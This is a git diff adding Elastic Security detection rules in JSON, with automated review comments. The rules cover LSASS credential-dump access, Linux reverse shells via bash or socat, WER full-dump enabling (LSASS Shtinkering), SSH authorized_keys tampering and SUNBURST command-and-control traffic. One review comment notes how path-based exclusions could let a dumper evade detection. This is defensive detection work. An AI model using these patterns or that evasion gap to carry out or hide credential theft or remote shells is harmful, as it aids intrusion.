*/\n\n (winlog.event_data.AccessMask : (\"0x1fffff\" , \"0x1010\", \"0x120089\", \"0x1F3FFF\") or\n winlog.event_data.AccessMaskDescription : (\"READ_CONTROL\", \"Read from process memory\"))\n\n /* Common Noisy False Positives */\n\n and not winlog.event_data.ProcessName : (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\system32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\*.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\System32\\\\poqexec.exe\")\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656", + "https://twitter.com/jsecurity101/status/1227987828534956033?s=20", + "https://attack.mitre.org/techniques/T1003/001/", + "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html", + "http://findingbad.blogspot.com/2017/", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMask", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessMaskDescription", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ObjectName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ProcessName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "208dbe77-01ed-4954-8d44-1e5751cb20de", + "setup": "## Setup\n\nEnsure advanced audit policies for Windows are enabled, specifically:\nObject 
Access policies [Event ID 4656](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4656) (Handle to an Object was Requested)\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nSystem Audit Policies >\nObject Access >\nAudit File System (Success,Failure)\nAudit Handle Manipulation (Success,Failure)\n```\n\nAlso, this event generates only if the object\u2019s [SACL](https://docs.microsoft.com/en-us/windows/win32/secauthz/access-control-lists) has the required access control entry (ACE) to handle the use of specific access rights.\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "208dbe77-01ed-4954-8d44-1e5751cb20de_110", + "type": "security-rule" +} \ No newline at end of file 
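Review bot: The `not winlog.event_data.ProcessName` exclusions in the query whitelist `?:\\Program Files\\*.exe` and `?:\\Program Files (x86)\\*.exe` by path alone, which is a weak control for a high-severity LSASS rule: opening `lsass.exe` with `0x1fffff`/`0x1010` normally requires SeDebugPrivilege or SYSTEM, and that same privilege level lets an attacker drop a dumper into Program Files (or under System32 as `dllhost.exe`, which is also excluded). Event 4656 carries no signer information, so these exceptions cannot be hardened with a signature check; consider narrowing them to the specific AV/EDR product directories actually observed and saying so in the false-positive section, which currently states only that there should be "very few or no false positives". Matching `winlog.event_data.AccessMaskDescription : "READ_CONTROL"` on its own is also broad — READ_CONTROL (0x20000) appears in many benign handle requests — and is likely to be the main noise source where that field is populated, so restricting it to the process-memory description may be preferable. The mixed-case `"0x1F3FFF"` alongside `"0x1fffff"` in the `AccessMask` list only works because `:` is case-insensitive on keyword fields; a one-line comment in the query (`/* ':' is case-insensitive; mask casing varies by forwarder */`) would stop a future reader from "fixing" it.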
diff --git a/packages/security_detection_engine/kibana/security_rule/2138bb70-5a5e-42fd-be5e-b38edf6a6777_2.json b/packages/security_detection_engine/kibana/security_rule/2138bb70-5a5e-42fd-be5e-b38edf6a6777_2.json new file mode 100644 index 00000000000..46f90888b5d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2138bb70-5a5e-42fd-be5e-b38edf6a6777_2.json 
@@ -0,0 +1,126 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This detection rule identifies suspicious network traffic patterns associated with TCP reverse shell activity. This activity consists of a network event that is followed by the creation of a shell process with suspicious command line arguments. An attacker may establish a Linux TCP reverse shell to gain remote access to a target system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Reverse Shell via Child", + "query": "sequence by host.id, process.entity_id with maxspan=5s\n [network where event.type == \"start\" and event.action in (\"connection_attempted\", \"connection_accepted\") and \n process.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"socat\") and destination.ip != null and \n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n [process where event.type == \"start\" and event.action == \"exec\" and \n process.name in (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.args : (\"-i\", \"-l\")) or (process.parent.name == \"socat\" and process.parent.args : \"*exec*\")\n )]\n", + "references": [ + "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2138bb70-5a5e-42fd-be5e-b38edf6a6777", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. 
If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + } + ], + "type": "eql", + "version": 2 + }, + "id": "2138bb70-5a5e-42fd-be5e-b38edf6a6777_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_6.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_6.json new file mode 100644 index 00000000000..23458d35af5 --- /dev/null 
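Review bot: The `tags` array of rule 2138bb70 lists only `Tactic: Execution`, while its `threat` array also maps the rule to TA0011 Command and Control; other rules in this diff (for example 22599847) keep the two aligned, so `"Tactic: Command and Control"` should be added to `tags` so tag-based filtering in Kibana surfaces the rule under both tactics. The same mismatch appears in 220be143-5c67-4fdb-b6ce-dd6826d024fd_6 and _7, whose `threat` includes TA0005 Defense Evasion but whose `tags` stop at `Tactic: Credential Access`. If these files are exported from the upstream rule source, the correction belongs there rather than in this package copy.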
+++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_6.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the enable of the full user-mode dumps feature system-wide. This feature allows Windows Error Reporting (WER) to collect data after an application crashes. This setting is a requirement for the LSASS Shtinkering attack, which fakes the communication of a crash on LSASS, generating a dump of the process memory, which gives the attacker access to the credentials present on the system without having to bring malware to the system. This setting is not enabled by default, and applications must create their registry subkeys to hold settings that enable them to collect dumps.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Full User-Mode Dumps Enabled System-Wide", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\"\n ) and\n registry.data.strings : (\"2\", \"0x00000002\") and\n not (process.executable : \"?:\\\\Windows\\\\system32\\\\svchost.exe\" and user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { 
+ "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "220be143-5c67-4fdb-b6ce-dd6826d024fd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 6 + }, + "id": "220be143-5c67-4fdb-b6ce-dd6826d024fd_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_7.json b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_7.json new file mode 100644 index 00000000000..dc94b363589 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/220be143-5c67-4fdb-b6ce-dd6826d024fd_7.json 
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the enable of the full user-mode dumps feature system-wide. This feature allows Windows Error Reporting (WER) to collect data after an application crashes. This setting is a requirement for the LSASS Shtinkering attack, which fakes the communication of a crash on LSASS, generating a dump of the process memory, which gives the attacker access to the credentials present on the system without having to bring malware to the system. This setting is not enabled by default, and applications must create their registry subkeys to hold settings that enable them to collect dumps.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Full User-Mode Dumps Enabled System-Wide", + "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType\"\n ) and\n registry.data.strings : (\"2\", \"0x00000002\") and\n not (process.executable : \"?:\\\\Windows\\\\system32\\\\svchost.exe\" and user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\"))\n", + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps", + "https://github.com/deepinstinct/Lsass-Shtinkering", + "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" 
+ }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "220be143-5c67-4fdb-b6ce-dd6826d024fd", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "220be143-5c67-4fdb-b6ce-dd6826d024fd_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205.json b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205.json new file mode 100644 index 00000000000..def435eae7d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205.json 
@@ -0,0 +1,125 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The Secure Shell (SSH) authorized_keys file specifies which users are allowed to log into a server using public key authentication. Adversaries may modify it to maintain persistence on a victim host by adding their own public key(s).", + "from": "now-9m", + "history_window_start": "now-10d", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "SSH Authorized Keys File Modification", + "new_terms_fields": [ + "host.id", + "process.executable" + ], + "query": "event.category:file and event.type:(change or creation) and\n file.name:(\"authorized_keys\" or \"authorized_keys2\" or \"/etc/ssh/sshd_config\" or \"/root/.ssh\") and\n not process.executable:\n (/Library/Developer/CommandLineTools/usr/bin/git or\n /usr/local/Cellar/maven/*/libexec/bin/mvn or\n /Library/Java/JavaVirtualMachines/jdk*.jdk/Contents/Home/bin/java or\n /usr/bin/vim or\n /usr/local/Cellar/coreutils/*/bin/gcat or\n /usr/bin/bsdtar or\n /usr/bin/nautilus or\n /usr/bin/scp or\n /usr/bin/touch or\n /var/lib/docker/* or\n /usr/bin/google_guest_agent or \n /opt/jc/bin/jumpcloud-agent or \n /opt/puppetlabs/puppet/bin/puppet or\n /usr/bin/chef-client\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { 
+ "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/", + "subtechnique": [ + { + "id": "T1098.004", + "name": "SSH Authorized Keys", + "reference": "https://attack.mitre.org/techniques/T1098/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1563", + "name": "Remote Service Session Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + }, + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 205 + }, + "id": "2215b8bd-1759-4ffa-8ab8-55c8e6b32e7f_205", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_108.json b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_108.json new file mode 100644 index 00000000000..53e9640e6dd --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/22599847-5d13-48cb-8872-5796fee8692b_108.json 
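Review bot: The `file.name` clause in this rule's `query` includes the full paths `"/etc/ssh/sshd_config"` and `"/root/.ssh"`, but ECS `file.name` carries only the basename, so those two alternatives can never match and the rule silently covers less than its description implies. Moving them to `file.path` would make them effective, e.g. `file.name:("authorized_keys" or "authorized_keys2") or file.path:(/etc/ssh/sshd_config or /root/.ssh/*)`, and `required_fields` would then need a `file.path` entry. Since this file appears to be an export of the upstream rule, the fix should be made at the source so later versions do not reintroduce it.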
@@ -0,0 +1,115 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "The malware known as SUNBURST targets the SolarWind's Orion business software for command and control. This rule detects post-exploitation command and control activity of the SUNBURST backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.network-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SUNBURST Command and Control Activity", + "note": "## Triage and analysis\n\n### Investigating SUNBURST Command and Control Activity\n\nSUNBURST is a trojanized version of a digitally signed SolarWinds Orion plugin called SolarWinds.Orion.Core.BusinessLayer.dll. The plugin contains a backdoor that communicates via HTTP to third-party servers. After an initial dormant period of up to two weeks, SUNBURST may retrieve and execute commands that instruct the backdoor to transfer files, execute files, profile the system, reboot the system, and disable system services. The malware's network traffic attempts to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol, and the malware stores persistent state data within legitimate plugin configuration files. The backdoor uses multiple obfuscated blocklists to identify processes, services, and drivers associated with forensic and anti-virus tools.\n\nMore details on SUNBURST can be found on the [Mandiant Report](https://www.mandiant.com/resources/sunburst-additional-technical-details).\n\nThis rule identifies suspicious network connections that attempt to blend in with legitimate SolarWinds activity by imitating the Orion Improvement Program (OIP) protocol behavior.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true positive (B-TP), as this configuration can put the environment at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Upgrade SolarWinds systems to the latest version to eradicate the chance of reinfection by abusing the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "network where host.os.type == \"windows\" and event.type == \"protocol\" and network.protocol == \"http\" and\n process.name : (\"ConfigurationWizard.exe\",\n \"NetFlowService.exe\",\n \"NetflowDatabaseMaintenance.exe\",\n \"SolarWinds.Administration.exe\",\n \"SolarWinds.BusinessLayerHost.exe\",\n \"SolarWinds.BusinessLayerHostx64.exe\",\n \"SolarWinds.Collector.Service.exe\",\n \"SolarwindsDiagnostics.exe\") and\n (\n (\n (http.request.body.content : \"*/swip/Upload.ashx*\" and http.request.body.content : (\"POST*\", \"PUT*\")) or\n (http.request.body.content : (\"*/swip/SystemDescription*\", \"*/swip/Events*\") and http.request.body.content : (\"GET*\", \"HEAD*\"))\n ) and\n not http.request.body.content : \"*solarwinds.com*\"\n )\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "http.request.body.content", + "type": "wildcard" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "22599847-5d13-48cb-8872-5796fee8692b", + "severity": "high", + "tags": [ + "Domain: 
Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "22599847-5d13-48cb-8872-5796fee8692b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_109.json b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_109.json new file mode 100644 index 00000000000..43c34146e5b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/2339f03c-f53f-40fa-834b-40c5983fc41f_109.json 
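Review bot: The investigation guide in `note` tells analysts to search for logon events (4624) "to the target host after the registry modification", but this rule matches HTTP network events and its query touches no registry data, so the sentence looks carried over from a registry-based rule and would misdirect triage. Suggest `Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the suspicious network activity.` As with the other rule files in this diff, the wording belongs in the upstream rule source if this file is generated from it.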
